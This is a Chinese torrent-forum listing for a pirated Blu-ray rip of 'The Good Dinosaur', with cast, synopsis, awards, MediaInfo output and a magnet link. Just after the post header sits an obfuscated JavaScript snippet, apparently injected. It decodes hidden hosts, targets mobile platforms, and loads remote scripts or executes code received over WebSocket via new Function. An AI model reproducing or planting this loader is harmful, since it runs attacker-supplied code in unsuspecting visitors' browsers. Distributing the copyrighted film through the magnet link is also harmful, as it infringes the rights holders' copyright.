恐龙当家[国语配音/粤语配音/中文字幕].The.Good.Dinosaur.2015.1080p.BluRay.x265.10bit.DTS.3Audio 6.51GB

版主小s 1月前 191

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 恐龙当家 / 恐龙大时代(港) / 美好的恐龙世界 / 善良的恐龙 / 恐龙管家
◎片  名 The Good Dinosaur
◎年  代 2015
◎产  地 美国
◎类  别 喜剧 / 动画 / 家庭 / 冒险
◎语  言 英语
◎上映日期 2015-11-25(美国)
◎IMDb链接 https://www.imdb.com/title/tt1979388/
◎豆瓣评分 7.4/10 (48875人评价)
◎豆瓣链接 https://movie.douban.com/subject/6875863/
◎片  长 93分钟
◎导  演 彼得·孙 Peter Sohn (id:1298008)
◎编  剧 鲍勃·彼德森 Bob Peterson (id:1294383)
       彼得·孙 Peter Sohn (id:1298008)
       埃里克·本森 Erik Benson (id:1353090)
       梅格·勒福夫 Meg LeFauve (id:1289713)
       凯尔西·曼 Kelsey Mann (id:1333007)
       彼得·赫奇斯 Peter Hedges (id:1009543)
       阿德里安·莫利纳 Adrian Molina (id:1370425)
◎演  员 雷蒙德·奥乔亚 Raymond Ochoa (id:1245109)
       杰克·布赖特 Jack Bright (id:1350758)
       杰弗里·怀特 Jeffrey Wright (id:1036484)
       斯蒂夫·扎恩 Steve Zahn (id:1035639)
       A·J·巴克利 A.J. Buckley (id:1071136)
       安娜·帕奎因 Anna Paquin (id:1012515)
       山姆·艾里奥特 Sam Elliott (id:1022599)
       弗兰西斯·麦克多蒙德 Frances McDormand (id:1010548)
       马库斯·斯克里布纳 Marcus Scribner (id:1343621)
       彼得·孙 Peter Sohn (id:1298008)
       史蒂文·克雷·亨特 Steven Clay Hunter (id:1438657)
       杰克·麦格劳 Jack McGraw (id:1423814)
       李·昂克里奇 Lee Unkrich (id:1022678)
       麦切尔·丹纳 Mychael Danna (id:1050402)
       Bryn Imagire Bryn Imagire (id:1365881)
       Huy Nguyen Huy Nguyen (id:1365882)
       史蒂文·克雷·亨特 Steven Clay Hunter (id:1438657)

◎标  签 动画 / 美国 / 皮克斯 / 成长 / 迪士尼 / 冒险 / Pixar / 2015

◎简  介
  6500万年前,一颗小行星与地球擦肩而过,称霸这个世界的恐龙懵懵懂懂地逃过了灭顶之灾。之后又过了数百万年,恐龙的智力得到进化,它们学会种植、畜牧、建筑,并且拥有属于自己的语言和家庭。某座山脚下的平原地带,雷龙一家迎来三个性格各异的娃娃,最小的阿洛(雷蒙德·奥乔亚 Ray mond Ochoa 配音)孱弱胆怯,与父亲的生离死别更在他的心中投下难以磨灭的阴影。一连串的事件过后,他与妈妈、哥哥、姐姐相隔万里。阿洛将这一切都归罪于原始人类的小孩点点(杰克·布赖特 Jack Bright 配音)。而点点似乎不为所动,他主动亲近阿洛,仿佛是一条忠诚勇敢的小狗。                                    
                                在充满坎坷和危险的回家之路上,阿洛与点点结伴而行,而这两个本不该碰面的恐龙和人类,将缔结超越了种族和时空的纯真友情……

◎获奖情况 (共17项)
  第73届金球奖 (2016)
  电影类 最佳动画长片(提名)

  第43届动画安妮奖 (2016)
  最佳动画长片(提名)
  最佳配乐(提名)
  最佳分镜(提名)
  最佳艺术指导(提名)
  最佳动画角色(提名)
  最佳角色设计(提名)
  最佳动画效果

  第27届美国制片人工会奖 (2016)
  最佳动画片制片人奖(提名)

  第66届美国剪辑工会奖 (2016)
  动画片最佳剪辑(提名)

  第14届美国视觉效果协会奖 (2016)
  最佳动画电影视觉效果
  最佳动画电影CG动画角色(提名)
  最佳动画电影CG背景
  最佳动画电影模拟动画效果

  第21届美国评论家选择电影奖 (2016)
  最佳动画片(提名)

  第19届美国在线影评人协会奖 (2015)
  最佳动画片(提名)

  第2届豆瓣电影年度榜单 (2015)
  评分最高的动画片(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 264419998354403445311879367956940933615 (0xC6ED70742A9202FCA2EEA11485EF49EF)

  4. Complete name                            : [email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.51 GiB

  8. Duration                                 : 1 h 33 min

  9. Overall bit rate                         : 9 932 kb/s

  10. Movie name                               : The Good Dinosaur 2015

  11. Encoded date                             : UTC 2021-08-01 03:51:58

  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 33 min

  23. Bit rate                                 : 7 121 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 804 pixels

  26. Display aspect ratio                     : 2.40:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.192

  33. Stream size                              : 4.67 GiB (72%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.20 / pbratio=1.10 / psy-rd=1.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio #1

  39. ID                                       : 2

  40. Format                                   : DTS

  41. Format/Info                              : Digital Theater Systems

  42. Codec ID                                 : A_DTS

  43. Duration                                 : 1 h 33 min

  44. Bit rate mode                            : Constant

  45. Bit rate                                 : 1 509 kb/s

  46. Channel(s)                               : 6 channels

  47. Channel layout                           : C L R Ls Rs LFE

  48. Sampling rate                            : 48.0 kHz

  49. Frame rate                               : 93.750 FPS (512 SPF)

  50. Bit depth                                : 24 bits

  51. Compression mode                         : Lossy

  52. Stream size                              : 1 013 MiB (15%)

  53. Language                                 : English

  54. Default                                  : Yes

  55. Forced                                   : No


  56. Audio #2

  57. ID                                       : 3

  58. Format                                   : AC-3

  59. Format/Info                              : Audio Coding 3

  60. Commercial name                          : Dolby Digital

  61. Codec ID                                 : A_AC3

  62. Duration                                 : 1 h 33 min

  63. Bit rate mode                            : Constant

  64. Bit rate                                 : 640 kb/s

  65. Channel(s)                               : 6 channels

  66. Channel layout                           : L R C LFE Ls Rs

  67. Sampling rate                            : 48.0 kHz

  68. Frame rate                               : 31.250 FPS (1536 SPF)

  69. Compression mode                         : Lossy

  70. Stream size                              : 430 MiB (6%)

  71. Title                                    : Cantonese

  72. Language                                 : Chinese

  73. Service kind                             : Complete Main

  74. Default                                  : Yes

  75. Forced                                   : No


  76. Audio #3

  77. ID                                       : 4

  78. Format                                   : AC-3

  79. Format/Info                              : Audio Coding 3

  80. Commercial name                          : Dolby Digital

  81. Codec ID                                 : A_AC3

  82. Duration                                 : 1 h 33 min

  83. Bit rate mode                            : Constant

  84. Bit rate                                 : 640 kb/s

  85. Channel(s)                               : 6 channels

  86. Channel layout                           : L R C LFE Ls Rs

  87. Sampling rate                            : 48.0 kHz

  88. Frame rate                               : 31.250 FPS (1536 SPF)

  89. Compression mode                         : Lossy

  90. Stream size                              : 430 MiB (6%)

  91. Title                                    : Mandarin

  92. Language                                 : Chinese

  93. Service kind                             : Complete Main

  94. Default                                  : Yes

  95. Forced                                   : No


  96. Text #1

  97. ID                                       : 5

  98. Format                                   : PGS

  99. Muxing mode                              : zlib

  100. Codec ID                                 : S_HDMV/PGS

  101. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration                                 : 1 h 33 min

  103. Bit rate                                 : 8 512 b/s

  104. Count of elements                        : 964

  105. Stream size                              : 5.68 MiB (0%)

  106. Language                                 : Chinese

  107. Default                                  : No

  108. Forced                                   : No


  109. Text #2

  110. ID                                       : 6

  111. Format                                   : PGS

  112. Muxing mode                              : zlib

  113. Codec ID                                 : S_HDMV/PGS

  114. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration                                 : 1 h 33 min

  116. Bit rate                                 : 8 947 b/s

  117. Count of elements                        : 1174

  118. Stream size                              : 5.97 MiB (0%)

  119. Language                                 : Chinese

  120. Default                                  : No

  121. Forced                                   : No


  122. Text #3

  123. ID                                       : 7

  124. Format                                   : PGS

  125. Muxing mode                              : zlib

  126. Codec ID                                 : S_HDMV/PGS

  127. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration                                 : 1 h 33 min

  129. Bit rate                                 : 9 190 b/s

  130. Count of elements                        : 1176

  131. Stream size                              : 6.13 MiB (0%)

  132. Language                                 : Chinese

  133. Default                                  : No

  134. Forced                                   : No


  135. Text #4

  136. ID                                       : 8

  137. Format                                   : PGS

  138. Muxing mode                              : zlib

  139. Codec ID                                 : S_HDMV/PGS

  140. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  141. Duration                                 : 1 h 33 min

  142. Bit rate                                 : 13.0 kb/s

  143. Count of elements                        : 968

  144. Stream size                              : 8.67 MiB (0%)

  145. Language                                 : English

  146. Default                                  : No

  147. Forced                                   : No


  148. Menu

  149. 00:00:00.000                             : Chapter 01

  150. 00:03:37.967                             : Chapter 02

  151. 00:06:16.459                             : Chapter 03

  152. 00:08:14.160                             : Chapter 04

  153. 00:12:12.606                             : Chapter 05

  154. 00:14:33.914                             : Chapter 06

  155. 00:17:42.352                             : Chapter 07

  156. 00:21:10.644                             : Chapter 08

  157. 00:22:58.168                             : Chapter 09

  158. 00:26:41.057                             : Chapter 10

  159. 00:29:02.615                             : Chapter 11

  160. 00:33:10.363                             : Chapter 12

  161. 00:35:28.668                             : Chapter 13

  162. 00:38:14.458                             : Chapter 14

  163. 00:41:08.841                             : Chapter 15

  164. 00:45:42.948                             : Chapter 16

  165. 00:47:47.948                             : Chapter 17

  166. 00:51:48.271                             : Chapter 18

  167. 00:55:46.968                             : Chapter 19

  168. 01:00:22.952                             : Chapter 20

  169. 01:03:59.001                             : Chapter 21

  170. 01:05:27.214                             : Chapter 22

  171. 01:07:11.777                             : Chapter 23

  172. 01:11:06.428                             : Chapter 24

  173. 01:13:43.377                             : Chapter 25

  174. 01:16:01.431                             : Chapter 26

  175. 01:19:08.493                             : Chapter 27

  176. 01:23:56.865                             : Chapter 28

  177. 01:26:01.114                             : Chapter 29



TAGS 冒险 动画 喜剧 家庭

磁力链:
  • magnet:?xt=urn:btih:CC6B1C240A9B0575836DF56C2B362B1482C53DD2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回